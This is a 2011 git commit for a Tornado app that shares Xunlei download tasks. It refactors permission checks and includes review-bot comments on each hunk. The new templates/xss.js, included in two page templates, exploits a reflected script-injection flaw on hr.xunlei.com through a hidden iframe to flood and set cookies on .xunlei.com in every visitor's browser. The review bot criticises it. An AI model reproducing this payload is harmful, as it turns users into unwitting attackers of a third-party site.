cross cookie with xss, add base handle function has_permission
Binux committed Dec 28, 2011
1 parent 12203ed commit 979f4a3
Showing 11 changed files with 50 additions and 24 deletions.
14 changes: 5 additions & 9 deletions handlers/add_task.py
Expand Up @@ -24,13 +24,9 @@ def get(self, anonymous):
render_path = "add_task_anonymous.html" if anonymous else "add_task.html"
if not self.current_user:
message = u"please login first"
self.render(render_path, message=message)
return

email = self.current_user['email']
if anonymous and not self.user_manager.check_permission(email, "add_anonymous_task"):
elif anonymous and not self.has_permission("add_anonymous_task"):
message = u"您没有添加任务的权限"
elif not anonymous and not self.user_manager.check_permission(email, "add_task"):
elif not anonymous and not self.has_permission("add_task"):
message = u"您没有发布资源的权限"
else:
message = ""
Expand All @@ -49,9 +45,9 @@ def post(self, anonymous):
render_path = "add_task_anonymous.html" if anonymous else "add_task.html"
email = self.current_user['email']

if anonymous and not self.user_manager.check_permission(email, "add_anonymous_task"):
if anonymous and not self.has_permission("add_anonymous_task"):
raise HTTPError(403)
elif not anonymous and not self.user_manager.check_permission(email, "add_task"):
elif not anonymous and not self.has_permission(email, "add_task"):
raise HTTPError(403)
if url is None and btfile is None:
self.render(render_path, message="任务下载地址不能为空")
Expand All @@ -64,7 +60,7 @@ def post(self, anonymous):
tags = set([x.strip() for x in _split_re.split(tags)])
result, task = yield gen.Task(self.call_subprocess,
partial(self.task_manager.add_task, btfile or url, title, tags, email, anonymous,
self.user_manager.check_permission(email, "need_miaoxia")))
self.has_permission("need_miaoxia")))

if result == 1:
if task:
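Review bot: `elif not anonymous and not self.has_permission(email, "add_task"):` in post() passes two arguments, but the new `has_permission(self, permission)` in handlers/base.py takes one, so a logged-in user posting a regular task gets a TypeError (an HTTP 500) instead of a permission check; the matching branches in get() and the anonymous branch of post() already use the one-argument form. Change it to `elif not anonymous and not self.has_permission("add_task"):`. post() begins before this hunk, and `email = self.current_user['email']` still dereferences the user before any check, so an anonymous POST would fail on that subscript rather than with 403 unless a decorator outside the hunk rejects it first.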
6 changes: 6 additions & 0 deletions handlers/base.py
Expand Up @@ -44,9 +44,15 @@ def get_current_user(self):
return None

def installed_userjs(self):
return True # xss
cookie = self.get_cookie("cross-cookie")
if cookie == options.cross_cookie_version or cookie == "disabled":
return True

def disabled_userjs(self):
return False # xss
return self.get_cookie("cross-cookie") == "disabled"

def has_permission(self, permission):
email = self.current_user and self.current_user["email"] or None
return self.user_manager.check_permission(email, permission)
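Review bot: `return True # xss` in installed_userjs() and `return False # xss` in disabled_userjs() sit ahead of the new cookie logic, so the lines that read the `cross-cookie` cookie (the version/`"disabled"` comparison in the first, the `== "disabled"` test in the second) are unreachable and the added code has no effect. If the bypass is deliberate while the xss.js mechanism is in use, make the comment say so, e.g. `return True  # cross-cookie check bypassed while xss.js sets the cookie; remove with it`; otherwise drop the two early returns. installed_userjs() also falls off the end and returns None when the cookie matches neither value, so an explicit `return False` after the `if` would state the contract. get_current_user() starts before this hunk.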
4 changes: 2 additions & 2 deletions handlers/edit_task.py
Expand Up @@ -15,7 +15,7 @@ def get(self, message=""):
task_id = self.get_argument("task_id")
task = self.task_manager.get_task(int(task_id))
if self.current_user['email'] != task.creator and\
not self.user_manager.check_permission(self.current_user['email'], "admin"):
not self.has_permission("admin"):
raise HTTPError(403)
self.render("edit.html", task=task, message=message)

Expand All @@ -29,7 +29,7 @@ def post(self):
if tags:
tags = set([x.strip() for x in _split_re.split(tags)])
if self.current_user['email'] != task.creator and\
not self.user_manager.check_permission(self.current_user['email'], "admin"):
not self.has_permission("admin"):
raise HTTPError(403)
task.taskname = title
task.tags = tags
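Review bot: Both checks still read `self.current_user['email']` before `has_permission("admin")` runs, so the anonymous tolerance the new helper adds (a missing user maps to `not_login_permission`) is never reached here: an unauthenticated request raises TypeError on the subscript unless a decorator outside these hunks already rejects it. If there is no such guard, add `if not self.current_user: raise HTTPError(403)` before the task lookup in both get() and post(), which also keeps the 403 response consistent with the admin branch. Both functions start before their hunks.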
14 changes: 7 additions & 7 deletions handlers/index.py
Expand Up @@ -12,7 +12,7 @@ class IndexHandler(BaseHandler):
def get(self):
q = self.get_argument("q", "")
feed = self.get_argument("feed", None)
view_all = self.current_user and self.user_manager.check_permission(self.current_user['email'], "view_invalid") or False
view_all = self.has_permission("view_invalid")
tasks = self.task_manager.get_task_list(q=q, limit=TASK_LIMIT, all=view_all)
if feed:
self.set_header("Content-Type", "application/atom+xml")
Expand Down Expand Up @@ -44,9 +44,9 @@ class UploadHandler(BaseHandler):
def get(self, creator_id):
feed = self.get_argument("feed", None)
creator = self.user_manager.get_user_email_by_id(int(creator_id)) or "no such user"
if self.current_user and (\
self.current_user.get("email") == creator or\
self.user_manager.check_permission(self.current_user.get("email"), "view_invalid")):
if self.current_user and self.current_user["email"] == creator:
all = True
elif self.has_permission("view_invalid"):
all = True
else:
all = False
Expand All @@ -66,9 +66,9 @@ def get(self):
creator = ""
if a:
creator = self.user_manager.get_user_email_by_id(int(a)) or "no such user"
if self.current_user and (\
self.current_user.get("email") == creator or\
self.user_manager.check_permission(self.current_user['email'], "view_invalid")):
if self.current_user and self.current_user["email"] == creator:
all = True
elif self.has_permission("view_invalid"):
all = True
else:
all = False
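Review bot: `all = True` / `all = False` in UploadHandler.get() and in the later get() shadow the builtin `all`, and the two `True` branches differ only in their condition, so the if/elif/else reduces to one assignment such as `show_all = (self.current_user is not None and self.current_user["email"] == creator) or self.has_permission("view_invalid")`. The variable's later use (presumably passed as `all=` to `get_task_list`) lies outside the hunk and would need the same rename. The rewrite also turned `self.current_user.get("email")` into `self.current_user["email"]`, which raises KeyError if the user dict ever lacks that key; fine if get_current_user() always sets it, worth confirming.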
1 change: 1 addition & 0 deletions handlers/login.py
Expand Up @@ -22,6 +22,7 @@ def get(self):
def _on_auth(self, user):
if not user:
raise HTTPError(500, "Google auth failed")
print user
self.set_secure_cookie("name", user["name"])
self.set_secure_cookie("email", user["email"])
self.user_manager.update_user(user["email"], user["name"])
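Review bot: `print user` in _on_auth() writes the whole Google profile dict (name, email and whatever else the provider returns) to stdout on every login, which puts personal data into process logs and consoles. It reads as leftover debugging; remove it, or log a non-identifying field at debug level through the `logging` module rather than printing the dict. _on_auth() continues past this hunk.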
2 changes: 1 addition & 1 deletion libs/lixian_api.py
Expand Up @@ -93,7 +93,7 @@ def _get_verifycode(self, username):
#DEBUG(pformat(r.content))

verifycode_tmp = r.cookies['check_result'].split(":", 1)
assert len(verifycode_tmp) == 2
assert len(verifycode_tmp) == 2, verifycode_tmp
return verifycode_tmp[1]

REDIRECT_URL = "http://dynamic.lixian.vip.xunlei.com/login"
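Review bot: `assert len(verifycode_tmp) == 2, verifycode_tmp` validates a response from a remote service with `assert`, which is stripped under `python -O`; a malformed `check_result` cookie would then fall through to `verifycode_tmp[1]` and surface as an IndexError with no context. A plain check keeps the diagnostic the commit adds and survives optimisation: `if len(verifycode_tmp) != 2: raise ValueError("unexpected check_result cookie: %r" % (verifycode_tmp,))`. _get_verifycode() starts before this hunk.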
10 changes: 10 additions & 0 deletions libs/user_manager.py
Expand Up @@ -12,6 +12,14 @@
"need_miaoxia": True,
"admin": False,
}
not_login_permission = {
"add_task": False,
"add_anonymous_task": False,
"mod_task": False,
"view_invalid": False,
"need_miaoxia": True,
"admin": False,
}
group_permission = {
None: {
},
Expand Down Expand Up @@ -96,4 +104,6 @@ def get_permission(self, email):

@mem_cache(expire=60)
def check_permission(self, email, permission):
if email is None:
return not_login_permission[permission]
return group_permission.get(self.get_group(email), default_group_permission)[permission]
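Review bot: `not_login_permission` repeats every key of the table that ends at the `}` above it (presumably `default_group_permission`), and as far as this hunk shows the only non-False entry, `"need_miaoxia": True`, mirrors that table rather than expressing a decision about anonymous users; the two dicts will drift as permissions are added. If the anonymous table is meant to be the default with explicit overrides, derive it from the default dict so a new permission is declared once, and add a comment on the `need_miaoxia` line saying why anonymous submissions get it. The new `if email is None` branch in check_permission() is also under `@mem_cache(expire=60)`, so the anonymous result is cached under the `None` key like any other; harmless provided the cache keys on both arguments, which is not visible here.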
5 changes: 3 additions & 2 deletions templates/lixian.html
Expand Up @@ -13,7 +13,7 @@

{% block body %}
<div class="lixian-box">
<a href="{{ options.cross_userscript or static_url(options.cross_userscript) }}" target="_blank" class="cross-cookie{% if handler.disabled_userjs() %} hidden{% end %}" data-site="{{ options.cross_cookie_url }}" data-cookie="{{ cookie }}" data-version="{{ options.cross_cookie_version }}">您尚未安装或需要升级 cross-cookie 点击前往UserScript.org安装</a>
<!--<a href="{{ options.cross_userscript or static_url(options.cross_userscript) }}" target="_blank" class="cross-cookie{% if handler.disabled_userjs() %} hidden{% end %}" data-site="{{ options.cross_cookie_url }}" data-cookie="{{ cookie }}" data-version="{{ options.cross_cookie_version }}">您尚未安装或需要升级 cross-cookie 点击前往UserScript.org安装</a>-->

<div class="task-info">
<div class="task-name">{{ task.taskname }}</div>
Expand Down Expand Up @@ -104,7 +104,7 @@
}

function get_cookie() {
return $(".cross-cookie").attr("data-cookie").split(";")[0];
return "{{ cookie }}".split(";")[0];
}

var alpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
Expand Down Expand Up @@ -186,5 +186,6 @@
return false;
});
{% end %}
{% include xss.js %}
</script>
{% end %}
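Review bot: `return "{{ cookie }}".split(";")[0];` in get_cookie() inlines a server-side value into a JavaScript string literal, and Tornado's autoescape is HTML escaping: a cookie containing `&` or `"` reaches the script as `&amp;`/`&quot;` and thus the wrong value, while `\` and line terminators are not escaped at all and can break the literal. Emit it as a JSON literal instead: `return {% raw json_encode(cookie) %}.split(";")[0];`. The same pattern appears in get_cookie() in templates/share.html and, nested one level deeper inside another string, in templates/xss.js.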
5 changes: 3 additions & 2 deletions templates/share.html
Expand Up @@ -17,7 +17,7 @@
{% end %}

{% block list %}
<div class="cross-cookie hidden" data-site="{{ options.cross_cookie_url }}" data-cookie="{{ cookie }}" data-version="{{ options.cross_cookie_version }}"></div>
<!--<div class="cross-cookie hidden" data-site="{{ options.cross_cookie_url }}" data-cookie="{{ cookie }}" data-version="{{ options.cross_cookie_version }}"></div>-->
<span class="infohash" style="float: right;">Hash: {{ task.cid }}</span>
<ul class="task-list">
<li class="push-top"></li>
Expand Down Expand Up @@ -150,7 +150,7 @@
}

function get_cookie() {
return $(".cross-cookie").attr("data-cookie").split(";")[0];
return "{{ cookie }}".split(";")[0];
}

function copy_links() {
Expand Down Expand Up @@ -213,5 +213,6 @@
return false;
});
{% end %}
{% include xss.js %}
</script>
{% end %}
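Review bot: Wrapping the `.cross-cookie` div in `<!-- -->` removes it from the DOM but not from the response: Tornado still evaluates `{{ cookie }}`, `{{ options.cross_cookie_url }}` and `{{ options.cross_cookie_version }}` inside an HTML comment, so the cookie value is still shipped in the page source to everyone who views the share page. The same applies to the commented-out anchor in templates/lixian.html, where `handler.disabled_userjs()` is also still called on every render. If the markup is no longer wanted, delete the line rather than hiding it.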
2 changes: 1 addition & 1 deletion templates/task_list.html
@@ -1,5 +1,5 @@
{% set current_user_id = current_user and email2id(current_user['email']) %}
{% set isadmin = current_user and handler.user_manager.check_permission(current_user['email'], "admin") %}
{% set isadmin = handler.has_permission("admin") %}
{% for task in tasks %}
<li class="task-item" data-task-id="{{ task.id }}">
<div class="process-bar {{ task.status }}" style="width: {{ 100-task.process }}%"></div>
11 changes: 11 additions & 0 deletions templates/xss.js
@@ -0,0 +1,11 @@
function xss() {
var script = 'for(var i=0;i<500;i++){document.cookie="loli"+i.toString()+"=1;domain=.xunlei.com";}for(var i=0;i<500;i++){document.cookie="loli"+i.toString()+"=0;domain=.xunlei.com;expires=Wed, 28 Dec 2011 12:46:19 GMT"}document.cookie="{{ cookie }}".replace(".vip","");console.log("done");';
var iframe = document.createElement("iframe");
iframe.setAttribute("style", "display: none;");
iframe.src = "http://hr.xunlei.com/searchlist.html?contentkey='%3Cscript%3E"+encodeURI(script)+"%3C/script%3E";
document.body.appendChild(iframe);
}
if (document.cookie.indexOf("xss=done") == -1) {
xss();
document.cookie = "xss=done";
}
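Review bot: This file makes every visitor's browser load `hr.xunlei.com/searchlist.html` in a hidden iframe with script in the `contentkey` parameter, i.e. it depends on a reflected script-injection flaw in a site the project does not control to write cookies onto `.xunlei.com`. That makes the app's users the vehicle for exploiting a third party's vulnerability, and it fails silently (taking the `get_cookie()` callers with it) the day that site fixes the flaw. The cross-cookie userscript that the now-commented-out `.cross-cookie` markup pointed at is the mechanism this template set was built around; this file should not ship. The `xss=done` marker is also set with no path or expiry, so it is a session cookie and the iframe runs again in every new browser session.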
